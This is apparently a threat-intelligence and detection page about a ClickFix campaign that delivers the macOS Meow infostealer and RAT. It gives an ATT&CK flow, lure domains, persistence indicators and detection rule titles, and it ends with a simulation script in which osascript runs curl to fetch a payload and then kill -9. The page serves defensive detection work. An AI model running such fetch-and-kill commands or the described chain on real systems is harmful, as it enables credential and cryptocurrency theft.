Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A Russian-speaking threat actor is using a ClickFix social engineering campaign to deploy a two-stage macOS malware infection. The attack starts with a fileless execution chain launched through terminal commands and delivers an AppleScript-based infostealer called Meow (DEBUG) along with a persistent remote access trojan. The malware targets cryptocurrency wallets, browser credentials, and messaging session data, while also carrying out intrusive code injection into desktop wallet applications.
Investigation
Netskope Threat Labs identified an updated version of the campaign on May 31, 2026, showing a shift from a basic stealer to a more capable RAT. Their analysis uncovered a sophisticated fileless infection flow, geofencing logic designed to avoid Russian-speaking victims, and ad-hoc re-signing used to bypass macOS Gatekeeper protections. The researchers also linked the campaign to 25 short-lived lure domains that shared the same registrar contact information.
Mitigation
Defenders should prioritize blocking lure domains and monitoring for suspicious terminal commands involving curl and osascript. Organizations should apply tighter controls over terminal access and watch for unauthorized changes to cryptocurrency wallet application bundles. Host-based detection can also focus on the persistence plist com.apple.accountsd and the /tmp/shub_ staging pattern.
Response
If this activity is detected, isolate the affected macOS host immediately to stop further data theft or potential lateral movement. All installed desktop cryptocurrency wallets should be treated as compromised and reinstalled from trusted sources. Investigators should also perform a forensic review of LaunchDaemons and LaunchAgents for unauthorized entries, with particular attention to com.apple.accountsd.
"graph TB %% Class Definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef persistence fill:#99ff99 classDef exfiltration fill:#ffff99 %% Initial Access and Execution attack_drive_by["<b>Action</b> – <b idea='T1189'>Drive-by Compromise</b><br/>Victims visit malicious lure domains<br/>such as filesapphirecanvas.sbs or<br/>filemintcastle.sbs masquerading as<br/>macOS utilities or GitHub repositories."] class attack_drive_by action attack_user_exec_copy["<b>Action</b> – <b idea='T1204.004'>User Execution: Malicious Copy and Paste</b><br/>Social engineering victims to copy<br/>commands from fake websites into<br/>the macOS Terminal."] class attack_user_exec_copy action attack_obfuscation["<b>Action</b> – <b idea='T1027.009'>Obfuscated Files or Information: Embedded Payloads</b><br/>Uses gzip-compressed and base64-encoded<br/>heredoc to run a stage 1 loader in memory."] class attack_obfuscation action %% Loader Logic and Guardrails loader_stage1["<b>Process</b> – <b idea='Stage 1 Loader'>Memory Resident Loader</b><br/>Executes via obfuscated command chain<br/>to avoid disk footprint."] class loader_stage1 tool guardrail_geofence["<b>Action</b> – <b idea='T1480.002'>Execution Guardrails: Mutual Exclusion</b><br/>Checks macOS keyboard layout to<br/>avoid Russian-speaking users via<br/>geofencing logic."] class guardrail_geofence action loader_reflective["<b>Action</b> – <b idea='T1620'>Reflective Code Loading</b><br/>Fetches second-stage AppleScript<br/>via curl and pipes directly into<br/>osascript memory."] class loader_reflective action %% Payload and Credential Theft malware_meow["<b>Malware</b> – <b idea='Meow Payload'>Meow Payload</b><br/>Memory-resident payload active<br/>after reflective loading."] class malware_meow malware attack_gui_capture["<b>Action</b> – <b idea='T1056.002'>Input Capture: GUI Input Capture</b><br/>Uses a spoofed System Preferences<br/>dialog to harvest user login passwords."] class attack_gui_capture action attack_securityd["<b>Action</b> – <b idea='T1555.002'>Credentials from Password Stores: Securityd Memory</b><br/>Unlocks macOS keychain to extract<br/>Safe Storage keys using harvested<br/>passwords."] class attack_securityd action %% Data Theft and Exfiltration attack_browser_discovery["<b>Action</b> – <b idea='T1217'>Browser Information Discovery</b><br/>Scans for browser data across<br/>Chrome, Safari, and Firefox."] class attack_browser_discovery action attack_session_steal["<b>Action</b> – <b idea='T1539'>Steal Web Session Cookie</b><br/>Exfiltrates session cookies to<br/>maintain unauthorized access."] class attack_session_steal exfiltration attack_crypto_theft["<b>Action</b> – <b idea='T1657'>Financial Theft</b><br/>Targets cryptocurrency wallets including<br/>MetaMask extensions and desktop apps<br/>like Exodus and Ledger."] class attack_crypto_theft exfiltration %% Persistence and C2 persistence_launch["<b>Persistence</b> – <b idea='T1543.001'>LaunchAgent or LaunchDaemon</b><br/>Creates a persistent mechanism<br/>disguised as com.apple.accountsd."] class persistence_launch persistence c2_beaconing["<b>Action</b> – <b idea='T1568'>Command and Control</b><br/>Establishes a 60-second beaconing loop<br/>with Dynamic Resolution for arbitrary<br/>code execution."] class c2_beaconing tool %% Connections attack_drive_by –>|leads_to| attack_user_exec_copy attack_user_exec_copy –>|triggers| attack_obfuscation attack_obfuscation –>|executes| loader_stage1 loader_stage1 –>|performs| guardrail_geofence guardrail_geofence –>|enables| loader_reflective loader_reflective –>|loads| malware_meow malware_meow –>|performs| attack_gui_capture attack_gui_capture –>|facilitates| attack_securityd attack_securityd –>|leads_to| attack_browser_discovery attack_browser_discovery –>|leads_to| attack_session_steal attack_browser_discovery –>|leads_to| attack_crypto_theft malware_meow –>|establishes| persistence_launch malware_meow –>|communicates_with| c2_beaconing "
Attack Flow
Detections
Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)
View
Possible MacOS Browser Password Discovery Attempt (via cmdline)
View
Possible Base64 Encoded Strings Manipulation [MacOS] (via cmdline)
View
Forced Code Signing of Modified Application Bundle (via cmdline)
View
MacOS Credential Validation via Dscl Authonly (via cmdline)
View
Suspicious Curl Execution Attempt [MacOS] (via cmdline)
View
Archive Was Created In MacOS Temporary Folder (via file_event)
View
Detection of Fileless macOS AppleScript Stealer Execution [Linux Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands: An adversary has gained initial access via a malicious website. They execute a fileless macOS AppleScript to bypass file-based scanning. The script’s goal is to download a secondary payload by spoofing a legitimate Chrome browser User-Agent to evade basic network inspection and then immediately terminate any running cryptocurrency wallet applications to prevent the user from securing their funds. The attacker uses
osascriptto callcurlwith specific flags andkill -9to perform these actions. -
Regression Test Script:
#!/bin/bash # Simulation of Fileless macOS AppleScript Stealer echo "[+] Starting Simulation: Fileless macOS Stealer" # Step 1: Simulate the curl payload fetch via osascript (Triggers selection_curl_ua) echo "[+] Executing Stage 1: Spoofed Curl via osascript..." osascript -e 'do shell script "curl -k -s --max-time 30 -H "User-Agent: Mozilla/5.0" http://localhost:8080/payload"' 2>/dev/null & # Wait a moment for process creation sleep 2 # Step 2: Simulate process termination (Triggers selection_kill) # We use a dummy process to kill so we don't disrupt the system echo "[+] Executing Stage 2: Process Termination via osascript..." sleep 1 osascript -e 'do shell script "kill -9 $$"' # Note: This kills the current subshell, simulating the intent # Note: For a cleaner simulation that mimics a real target: # sleep 1 && sleep 1 & # osascript -e 'do shell script "kill -9 $!"' echo "[+] Simulation Commands Sent." -
Cleanup Commands:
# No files were created by the script, but we ensure no lingering background processes exist. killall osascript 2>/dev/null echo "[+] Cleanup Complete."